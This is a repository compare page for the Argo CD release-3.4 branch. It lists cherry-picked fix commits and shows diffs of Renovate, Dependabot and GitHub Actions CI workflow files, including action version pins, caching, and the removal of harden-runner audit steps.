Compare commits

..

29 Commits

Author SHA1 Message Date
argo-cd-cherry-pick-bot[bot]
a061d1c664 fix: prevent automatic refreshes from informer resync and status updates (cherry-pick #25290 for 3.4) (#27229)
Signed-off-by: Atif Ali <atali@redhat.com>
Co-authored-by: Atif Ali <atali@redhat.com>
Co-authored-by: Keith Chong <kykchong@redhat.com>
2026-04-09 15:53:23 -04:00
argo-cd-cherry-pick-bot[bot]
67d12ebbd4 fix(hook): Fixed hook code issues that caused stuck applications on "Deleting" state (Issues #18355 and #17191) (cherry-pick #26724 for 3.4) (#27257)
Signed-off-by: Nikolaos Astyrakakis <nastyrakakis@gmail.com>
Co-authored-by: Nikolaos Astyrakakis <3193713+nikos445@users.noreply.github.com>
2026-04-09 06:04:06 -10:00
argo-cd-cherry-pick-bot[bot]
58a6f85650 fix(ui): handle 401 error in stream (cherry-pick #26917 for 3.4) (#27228)
Signed-off-by: linghaoSu <linghao.su@daocloud.io>
Co-authored-by: Linghao Su <linghao.su@daocloud.io>
2026-04-08 15:36:56 +02:00
argo-cd-cherry-pick-bot[bot]
60fed8b4ec chore(deps): bump github.com/go-jose/go-jose/v4 from 4.1.3 to 4.1.4 (cherry-pick #27101 for 3.4) (#27207)
Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
2026-04-07 09:25:44 -04:00
argo-cd-cherry-pick-bot[bot]
0a29bfd093 fix: use unique names for initial commits (cherry-pick #27171 for 3.4) (#27198)
Signed-off-by: Sean Liao <sean@liao.dev>
Co-authored-by: Sean Liao <sean@liao.dev>
2026-04-06 16:47:33 -04:00
argo-cd-cherry-pick-bot[bot]
33247b96fe fix(hydrator): preserve all source type fields in GetDrySource() (cherry-pick #27189 for 3.4) (#27196)
Signed-off-by: Alexandre Gaudreault <alexandre_gaudreault@intuit.com>
Co-authored-by: Alexandre Gaudreault <alexandre_gaudreault@intuit.com>
2026-04-06 15:47:03 -04:00
argo-cd-cherry-pick-bot[bot]
696a18f7d3 fix: Add X-Frame-Options and CSP headers to Swagger UI endpoints (cherry-pick #26521 for 3.4) (#27153)
Signed-off-by: rohansood10 <rohansood10@users.noreply.github.com>
Signed-off-by: Blake Pettersson <blake.pettersson@gmail.com>
Co-authored-by: Rohan Sood <56945243+rohansood10@users.noreply.github.com>
Co-authored-by: rohansood10 <rohansood10@users.noreply.github.com>
Co-authored-by: Blake Pettersson <blake.pettersson@gmail.com>
Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
2026-04-06 04:36:21 +03:00
argo-cd-cherry-pick-bot[bot]
b648248984 fix: trigger app sync on app-set spec change (cherry-pick #26811 for 3.4) (#27131)
Signed-off-by: Patroklos Papapetrou <ppapapetrou76@gmail.com>
Co-authored-by: Papapetrou Patroklos <1743100+ppapapetrou76@users.noreply.github.com>
2026-04-05 15:51:24 -04:00
argo-cd-cherry-pick-bot[bot]
99e29c7d91 fix(docs): Fix manifest path in Source Hydrator docs (cherry-pick #27123 for 3.4) (#27166)
Signed-off-by: Oliver Gondža <ogondza@gmail.com>
Co-authored-by: Oliver Gondža <ogondza@gmail.com>
2026-04-05 10:22:55 -04:00
rumstead
f50abb6596 fix(controller): reduce secret deepcopies and deserialization (#27049) (cherry-pick release-3.4) (#27132)
Signed-off-by: rumstead <37445536+rumstead@users.noreply.github.com>
2026-04-02 15:07:56 -04:00
argo-cd-cherry-pick-bot[bot]
a244f7cb7a fix(server): Ensure OIDC config is refreshed at server restart (cherry-pick #26913 for 3.4) (#27115)
Signed-off-by: OpenGuidou <guillaume.doussin@gmail.com>
Co-authored-by: OpenGuidou <73480729+OpenGuidou@users.noreply.github.com>
2026-04-01 17:58:24 -07:00
Jonathan Ogilvie
f4e7a6e604 [release-3.4] fix: improve perf: switch parentUIDToChildren to map of sets, remove cache rebuild (#26863) (#27110)
Signed-off-by: Jonathan Ogilvie <jonathan.ogilvie@sumologic.com>
Signed-off-by: Jonathan Ogilvie <679297+jcogilvie@users.noreply.github.com>
2026-04-01 11:45:22 -04:00
argo-cd-cherry-pick-bot[bot]
dfa079b5e3 fix: pass repo.insecure flag to helm dependency build (cherry-pick #27078 for 3.4) (#27082)
Signed-off-by: Blake Pettersson <blake.pettersson@gmail.com>
Co-authored-by: Blake Pettersson <blake.pettersson@gmail.com>
2026-03-30 22:38:34 -10:00
argo-cd-cherry-pick-bot[bot]
8550f60a05 fix: force attempt http2 with custom tls config (#26975) (cherry-pick #26976 for 3.4) (#27073)
Signed-off-by: Max Verbeek <m4xv3rb33k@gmail.com>
Co-authored-by: Max Verbeek <m4xv3rb33k@gmail.com>
2026-03-30 05:37:06 -10:00
github-actions[bot]
d29ec76295 Bump version to 3.4.0-rc4 on release-3.4 branch (#27046)
Signed-off-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com>
Co-authored-by: crenshaw-dev <350466+crenshaw-dev@users.noreply.github.com>
2026-03-27 10:07:01 -04:00
argo-cd-cherry-pick-bot[bot]
249b91d75b fix: wrong installation id returned from cache (cherry-pick #26969 for 3.4) (#27028)
Signed-off-by: Zach Aller <zach_aller@intuit.com>
Co-authored-by: Zach Aller <zachaller@users.noreply.github.com>
2026-03-27 09:24:20 -04:00
argo-cd-cherry-pick-bot[bot]
ed4c63ba83 fix: controller incorrectly detecting diff during app normalization (cherry-pick #27002 for 3.4) (#27014)
Signed-off-by: Alexander Matyushentsev <alexander@akuity.io>
Co-authored-by: Alexander Matyushentsev <AMatyushentsev@gmail.com>
2026-03-25 14:13:02 -07:00
github-actions[bot]
cbdc3f1397 Bump version to 3.4.0-rc3 on release-3.4 branch (#27006)
Signed-off-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com>
Co-authored-by: reggie-k <19544836+reggie-k@users.noreply.github.com>
2026-03-25 15:46:13 +02:00
argo-cd-cherry-pick-bot[bot]
b66dea4282 fix: Hook resources not created at PostSync when configured with PreDelete PostDelete hooks (cherry-pick #26996 for 3.4) (#26998)
Signed-off-by: reggie-k <regina.voloshin@codefresh.io>
Co-authored-by: Regina Voloshin <regina.voloshin@codefresh.io>
2026-03-25 13:23:57 +02:00
argo-cd-cherry-pick-bot[bot]
aced2b1b36 fix(ui): Improve message on self-healing disabling panel (#26977) (cherry-pick #26978 for 3.4) (#26980)
Signed-off-by: Alberto Chiusole <chiusole@seqera.io>
Co-authored-by: Alberto Chiusole <1922124+bebosudo@users.noreply.github.com>
2026-03-24 17:57:32 +02:00
argo-cd-cherry-pick-bot[bot]
ea71adbae5 chore(deps): bump google.golang.org/grpc from 1.79.2 to 1.79.3 (cherry-pick #26886 for 3.4) (#26952)
Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: Blake Pettersson <blake.pettersson@gmail.com>
2026-03-22 15:46:39 +02:00
argo-cd-cherry-pick-bot[bot]
5ed403cf60 fix(server): fix find container logic for terminal (cherry-pick #26858 for 3.4) (#26933)
Signed-off-by: linghaoSu <linghao.su@daocloud.io>
Co-authored-by: Linghao Su <linghao.su@daocloud.io>
2026-03-20 13:00:53 +01:00
github-actions[bot]
9044c6c0ff Bump version to 3.4.0-rc2 on release-3.4 branch (#26927)
Signed-off-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com>
Co-authored-by: jannfis <3942683+jannfis@users.noreply.github.com>
2026-03-19 19:00:49 -04:00
argo-cd-cherry-pick-bot[bot]
3157fb15a4 feat(helm): support wildcard glob patterns for valueFiles (cherry-pick #26768 for 3.4) (#26919)
Signed-off-by: nitishfy <justnitish06@gmail.com>
Co-authored-by: Nitish Kumar <justnitish06@gmail.com>
2026-03-19 15:48:06 -04:00
argo-cd-cherry-pick-bot[bot]
e70034a44b fix(ci): add .gitkeep to images dir (cherry-pick #26892 for 3.4) (#26912)
Signed-off-by: Blake Pettersson <blake.pettersson@gmail.com>
Co-authored-by: Blake Pettersson <blake.pettersson@gmail.com>
2026-03-19 15:36:36 +02:00
argo-cd-cherry-pick-bot[bot]
5deef68eaf fix(ui): include _-prefixed dirs in embedded assets (cherry-pick #26589 for 3.4) (#26909)
Signed-off-by: choejwoo <jaewoo45@gmail.com>
Co-authored-by: Jaewoo Choi <jaewoo45@gmail.com>
2026-03-19 15:35:50 +02:00
argo-cd-cherry-pick-bot[bot]
21e13a621e fix(UI): show RollingSync step clearly when labels match no step (cherry-pick #26877 for 3.4) (#26882)
Signed-off-by: Atif Ali <atali@redhat.com>
Co-authored-by: Atif Ali <atali@redhat.com>
2026-03-17 21:41:53 -04:00
argo-cd-cherry-pick-bot[bot]
226178c1a5 fix: stack overflow when processing circular ownerrefs in resource graph (#26783) (cherry-pick #26790 for 3.4) (#26878)
Signed-off-by: Jonathan Ogilvie <jonathan.ogilvie@sumologic.com>
Signed-off-by: Jonathan Ogilvie <679297+jcogilvie@users.noreply.github.com>
Co-authored-by: Jonathan Ogilvie <679297+jcogilvie@users.noreply.github.com>
Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
2026-03-17 22:55:48 +01:00
github-actions[bot]
d91a2ab3bf Bump version to 3.4.0-rc1 on release-3.4 branch (#26853)
Signed-off-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com>
Co-authored-by: reggie-k <19544836+reggie-k@users.noreply.github.com>
2026-03-16 12:43:12 +02:00
264 changed files with 33428 additions and 886169 deletions

View File

@@ -11,7 +11,6 @@ module.exports = {
"github>argoproj/argo-cd//renovate-presets/custom-managers/yaml.json5",
"github>argoproj/argo-cd//renovate-presets/fix/disable-all-updates.json5",
"github>argoproj/argo-cd//renovate-presets/devtool.json5",
"github>argoproj/argo-cd//renovate-presets/docs.json5",
"group:aws-sdk-go-v2Monorepo"
"github>argoproj/argo-cd//renovate-presets/docs.json5"
]
}

View File

@@ -8,9 +8,6 @@ updates:
ignore:
- dependency-name: k8s.io/*
groups:
aws-sdk-v2:
patterns:
- "github.com/aws/aws-sdk-go-v2*"
otel:
patterns:
- "go.opentelemetry.io/*"

View File

@@ -4,10 +4,6 @@ on:
permissions: {}
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
jobs:
prepare-release:
permissions:
@@ -16,12 +12,6 @@ jobs:
name: Automatically update major version
runs-on: ubuntu-24.04
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
with:
@@ -47,7 +37,7 @@ jobs:
working-directory: /home/runner/go/src/github.com/argoproj/argo-cd
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ env.GOLANG_VERSION }}
- name: Add ~/go/bin to PATH
@@ -96,4 +86,4 @@ jobs:
- [ ] Add an upgrade guide to the docs for this version
branch: bump-major-version
branch-suffix: random
signoff: true
signoff: true

View File

@@ -25,24 +25,14 @@ on:
CHERRYPICK_APP_PRIVATE_KEY:
required: true
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
jobs:
cherry-pick:
name: Cherry Pick to ${{ inputs.version_number }}
runs-on: ubuntu-24.04
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Generate a token
id: generate-token
uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3.0.0
uses: actions/create-github-app-token@29824e69f54612133e76f7eaac726eef6c875baf # v2.2.1
with:
app-id: ${{ secrets.CHERRYPICK_APP_ID }}
private-key: ${{ secrets.CHERRYPICK_APP_PRIVATE_KEY }}
@@ -76,7 +66,6 @@ jobs:
# Create new branch for cherry-pick
CHERRY_PICK_BRANCH="cherry-pick-${{ inputs.pr_number }}-to-${TARGET_BRANCH}"
git checkout -b "$CHERRY_PICK_BRANCH" "origin/$TARGET_BRANCH"
# Perform cherry-pick
@@ -86,17 +75,12 @@ jobs:
# Extract Signed-off-by from the cherry-pick commit
SIGNOFF=$(git log -1 --pretty=format:"%B" | grep -E '^Signed-off-by:' || echo "")
# Push the new branch. Force push to ensure that in case the original cherry-pick branch is stale,
# that the current state of the $TARGET_BRANCH + cherry-pick gets in $CHERRY_PICK_BRANCH.
git push origin -f "$CHERRY_PICK_BRANCH"
# Push the new branch
git push origin "$CHERRY_PICK_BRANCH"
# Save data for PR creation
echo "branch_name=$CHERRY_PICK_BRANCH" >> "$GITHUB_OUTPUT"
{
echo "signoff<<EOF"
echo "$SIGNOFF"
echo "EOF"
} >> "$GITHUB_OUTPUT"
echo "signoff=$SIGNOFF" >> "$GITHUB_OUTPUT"
echo "target_branch=$TARGET_BRANCH" >> "$GITHUB_OUTPUT"
else
echo "❌ Cherry-pick failed due to conflicts"

View File

@@ -6,10 +6,6 @@ on:
- master
types: ["labeled", "closed"]
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
jobs:
find-labels:
name: Find Cherry Pick Labels
@@ -22,12 +18,6 @@ jobs:
outputs:
labels: ${{ steps.extract-labels.outputs.labels }}
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Extract cherry-pick labels
id: extract-labels
run: |
@@ -60,4 +50,4 @@ jobs:
pr_title: ${{ github.event.pull_request.title }}
secrets:
CHERRYPICK_APP_ID: ${{ vars.CHERRYPICK_APP_ID }}
CHERRYPICK_APP_PRIVATE_KEY: ${{ secrets.CHERRYPICK_APP_PRIVATE_KEY }}
CHERRYPICK_APP_PRIVATE_KEY: ${{ secrets.CHERRYPICK_APP_PRIVATE_KEY }}

View File

@@ -14,9 +14,7 @@ on:
env:
# Golang version to use across CI steps
# renovate: datasource=golang-version packageName=golang
GOLANG_VERSION: '1.26.2'
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
GOLANG_VERSION: '1.26.0'
concurrency:
group: ${{ github.workflow }}-${{ github.ref }}
@@ -33,11 +31,6 @@ jobs:
frontend: ${{ steps.filter.outputs.frontend_any_changed }}
docs: ${{ steps.filter.outputs.docs_any_changed }}
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
- uses: tj-actions/changed-files@22103cc46bda19c2b464ffe86db46df6922fd323 # v47.0.5
id: filter
@@ -61,15 +54,10 @@ jobs:
needs:
- changes
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ env.GOLANG_VERSION }}
- name: Download all Go modules
@@ -86,27 +74,18 @@ jobs:
needs:
- changes
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ env.GOLANG_VERSION }}
- name: Restore go build and module cache
uses: actions/cache@668228422ae6a00e4ad889ee87cd7109ec5666a7 # v5.0.4
- name: Restore go build cache
uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
with:
path: |
~/.cache/go-build
~/go/pkg/mod
key: ${{ runner.os }}-go-build-v1-${{ hashFiles('**/go.sum') }}
restore-keys: |
${{ runner.os }}-go-build-v1-
- name: Download Go modules
path: ~/.cache/go-build
key: ${{ runner.os }}-go-build-v1-${{ github.run_id }}
- name: Download all Go modules
run: |
go mod download
- name: Compile all packages
@@ -122,22 +101,17 @@ jobs:
needs:
- changes
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ env.GOLANG_VERSION }}
- name: Run golangci-lint
uses: golangci/golangci-lint-action@1e7e51e771db61008b38414a730f564565cf7c20 # v9.2.0
with:
# renovate: datasource=go packageName=github.com/golangci/golangci-lint/v2 versioning=regex:^v(?<major>\d+)\.(?<minor>\d+)\.(?<patch>\d+)?$
version: v2.11.4
version: v2.11.3
args: --verbose
test-go:
@@ -151,11 +125,6 @@ jobs:
GITHUB_TOKEN: ${{ secrets.E2E_TEST_GITHUB_TOKEN || secrets.GITHUB_TOKEN }}
GITLAB_TOKEN: ${{ secrets.E2E_TEST_GITLAB_TOKEN }}
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Create checkout directory
run: mkdir -p ~/go/src/github.com/argoproj
- name: Checkout code
@@ -163,7 +132,7 @@ jobs:
- name: Create symlink in GOPATH
run: ln -s $(pwd) ~/go/src/github.com/argoproj/argo-cd
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ env.GOLANG_VERSION }}
- name: Install required packages
@@ -182,15 +151,11 @@ jobs:
- name: Add /usr/local/bin to PATH
run: |
echo "/usr/local/bin" >> $GITHUB_PATH
- name: Restore go build and module cache
uses: actions/cache@668228422ae6a00e4ad889ee87cd7109ec5666a7 # v5.0.4
- name: Restore go build cache
uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
with:
path: |
~/.cache/go-build
~/go/pkg/mod
key: ${{ runner.os }}-go-build-v1-${{ hashFiles('**/go.sum') }}
restore-keys: |
${{ runner.os }}-go-build-v1-
path: ~/.cache/go-build
key: ${{ runner.os }}-go-build-v1-${{ github.run_id }}
- name: Install all tools required for building & testing
run: |
make install-test-tools-local
@@ -202,7 +167,7 @@ jobs:
run: |
git config --global user.name "John Doe"
git config --global user.email "john.doe@example.com"
- name: Download Go modules
- name: Download and vendor all required packages
run: |
go mod download
- name: Run all unit tests
@@ -224,11 +189,6 @@ jobs:
GITHUB_TOKEN: ${{ secrets.E2E_TEST_GITHUB_TOKEN || secrets.GITHUB_TOKEN }}
GITLAB_TOKEN: ${{ secrets.E2E_TEST_GITLAB_TOKEN }}
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Create checkout directory
run: mkdir -p ~/go/src/github.com/argoproj
- name: Checkout code
@@ -236,7 +196,7 @@ jobs:
- name: Create symlink in GOPATH
run: ln -s $(pwd) ~/go/src/github.com/argoproj/argo-cd
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ env.GOLANG_VERSION }}
- name: Install required packages
@@ -255,15 +215,11 @@ jobs:
- name: Add /usr/local/bin to PATH
run: |
echo "/usr/local/bin" >> $GITHUB_PATH
- name: Restore go build and module cache
uses: actions/cache@668228422ae6a00e4ad889ee87cd7109ec5666a7 # v5.0.4
- name: Restore go build cache
uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
with:
path: |
~/.cache/go-build
~/go/pkg/mod
key: ${{ runner.os }}-go-build-v1-${{ hashFiles('**/go.sum') }}
restore-keys: |
${{ runner.os }}-go-build-v1-
path: ~/.cache/go-build
key: ${{ runner.os }}-go-build-v1-${{ github.run_id }}
- name: Install all tools required for building & testing
run: |
make install-test-tools-local
@@ -275,7 +231,7 @@ jobs:
run: |
git config --global user.name "John Doe"
git config --global user.email "john.doe@example.com"
- name: Download Go modules
- name: Download and vendor all required packages
run: |
go mod download
- name: Run all unit tests
@@ -293,15 +249,10 @@ jobs:
needs:
- changes
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ env.GOLANG_VERSION }}
- name: Create symlink in GOPATH
@@ -355,31 +306,26 @@ jobs:
needs:
- changes
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
- name: Install pnpm
uses: pnpm/action-setup@a7487c7e89a18df4991f7f222e4898a00d66ddda # v4.1.0
with:
package_json_file: ui/package.json
- name: Setup NodeJS
uses: actions/setup-node@53b83947a5a98c8d113130e565377fae1a50d02f # v6.3.0
with:
# renovate: datasource=node-version packageName=node versioning=node
node-version: '22.9.0'
cache: 'pnpm'
cache-dependency-path: '**/pnpm-lock.yaml'
- name: Restore node dependency cache
id: cache-dependencies
uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
with:
path: ui/node_modules
key: ${{ runner.os }}-node-dep-v2-${{ hashFiles('**/yarn.lock') }}
- name: Install node dependencies
run: |
cd ui && pnpm i --frozen-lockfile
cd ui && yarn install --frozen-lockfile --ignore-optional --non-interactive
- name: Build UI code
run: |
pnpm test
pnpm build
yarn test
yarn build
env:
NODE_ENV: production
NODE_ONLINE_ENV: online
@@ -388,7 +334,7 @@ jobs:
CODECOV_TOKEN: ${{ github.ref == 'refs/heads/master' && secrets.CODECOV_TOKEN || '' }}
working-directory: ui/
- name: Run ESLint
run: pnpm lint
run: yarn lint
working-directory: ui/
shellcheck:
@@ -413,15 +359,19 @@ jobs:
sonar_secret: ${{ secrets.SONAR_TOKEN }}
codecov_secret: ${{ secrets.CODECOV_TOKEN }}
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
with:
fetch-depth: 0
- name: Restore node dependency cache
id: cache-dependencies
uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
with:
path: ui/node_modules
key: ${{ runner.os }}-node-dep-v2-${{ hashFiles('**/yarn.lock') }}
- name: Remove other node_modules directory
run: |
rm -rf ui/node_modules/argo-ui/node_modules
- name: Get e2e code coverage
uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8.0.1
with:
@@ -442,7 +392,7 @@ jobs:
- name: Upload code coverage information to codecov.io
# Only run when the workflow is for upstream (PR target or push is in argoproj/argo-cd).
if: github.repository == 'argoproj/argo-cd'
uses: codecov/codecov-action@57e3a136b779b570ffcdbf80b3bdc90e7fab3de2 # v6.0.0
uses: codecov/codecov-action@671740ac38dd9b0130fbe1cec585b89eea48d3de # v5.5.2
with:
files: test-results/full-coverage.out
fail_ci_if_error: true
@@ -451,7 +401,7 @@ jobs:
- name: Upload test results to Codecov
# Codecov uploads test results to Codecov.io on upstream master branch.
if: github.repository == 'argoproj/argo-cd' && github.ref == 'refs/heads/master' && github.event_name == 'push'
uses: codecov/codecov-action@57e3a136b779b570ffcdbf80b3bdc90e7fab3de2 # v6.0.0
uses: codecov/codecov-action@671740ac38dd9b0130fbe1cec585b89eea48d3de # v5.5.2
with:
files: test-results/junit.xml
fail_ci_if_error: true
@@ -461,7 +411,7 @@ jobs:
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }}
uses: SonarSource/sonarqube-scan-action@299e4b793aaa83bf2aba7c9c14bedbb485688ec4 # v7.1.0
uses: SonarSource/sonarqube-scan-action@a31c9398be7ace6bbfaf30c0bd5d415f843d45e9 # v7.0.0
if: env.sonar_secret != ''
test-e2e:
name: Run end-to-end tests
@@ -494,11 +444,6 @@ jobs:
GITHUB_TOKEN: ${{ secrets.E2E_TEST_GITHUB_TOKEN || secrets.GITHUB_TOKEN }}
GITLAB_TOKEN: ${{ secrets.E2E_TEST_GITLAB_TOKEN }}
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Free Disk Space (Ubuntu)
uses: jlumbroso/free-disk-space@54081f138730dfa15788a46383842cd2f914a1be
with:
@@ -509,21 +454,12 @@ jobs:
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ env.GOLANG_VERSION }}
- name: Set GOPATH
run: |
echo "GOPATH=$HOME/go" >> $GITHUB_ENV
- name: Setup NodeJS
uses: actions/setup-node@53b83947a5a98c8d113130e565377fae1a50d02f # v6.3.0
with:
# renovate: datasource=node-version packageName=node versioning=node
node-version: '22.9.0'
- name: Install pnpm
uses: pnpm/action-setup@a7487c7e89a18df4991f7f222e4898a00d66ddda # v4.1.0
with:
package_json_file: ui/package.json
- name: GH actions workaround - Kill XSP4 process
run: |
sudo pkill mono || true
@@ -539,15 +475,11 @@ jobs:
sudo chown $(whoami) $HOME/.kube/config
sudo chmod go-r $HOME/.kube/config
kubectl version
- name: Restore go build and module cache
uses: actions/cache@668228422ae6a00e4ad889ee87cd7109ec5666a7 # v5.0.4
- name: Restore go build cache
uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
with:
path: |
~/.cache/go-build
~/go/pkg/mod
key: ${{ runner.os }}-go-build-v1-${{ hashFiles('**/go.sum') }}
restore-keys: |
${{ runner.os }}-go-build-v1-
path: ~/.cache/go-build
key: ${{ runner.os }}-go-build-v1-${{ github.run_id }}
- name: Add ~/go/bin to PATH
run: |
echo "$HOME/go/bin" >> $GITHUB_PATH
@@ -557,12 +489,10 @@ jobs:
- name: Add ./dist to PATH
run: |
echo "$(pwd)/dist" >> $GITHUB_PATH
- name: Download Go modules
- name: Download Go dependencies
run: |
go mod download
- name: Install goreman
run: |
go install github.com/mattn/goreman@v0.3.17
go install github.com/mattn/goreman@latest
- name: Install all tools required for building & testing
run: |
make install-test-tools-local
@@ -630,11 +560,6 @@ jobs:
- changes
runs-on: ubuntu-24.04
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- run: |
result="${{ needs.test-e2e.result }}"
# mark as successful even if skipped

View File

@@ -28,10 +28,6 @@ concurrency:
permissions:
contents: read
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
jobs:
CodeQL-Build:
permissions:
@@ -43,24 +39,18 @@ jobs:
# CodeQL runs on ubuntu-latest and windows-latest
runs-on: ubuntu-24.04
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout repository
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
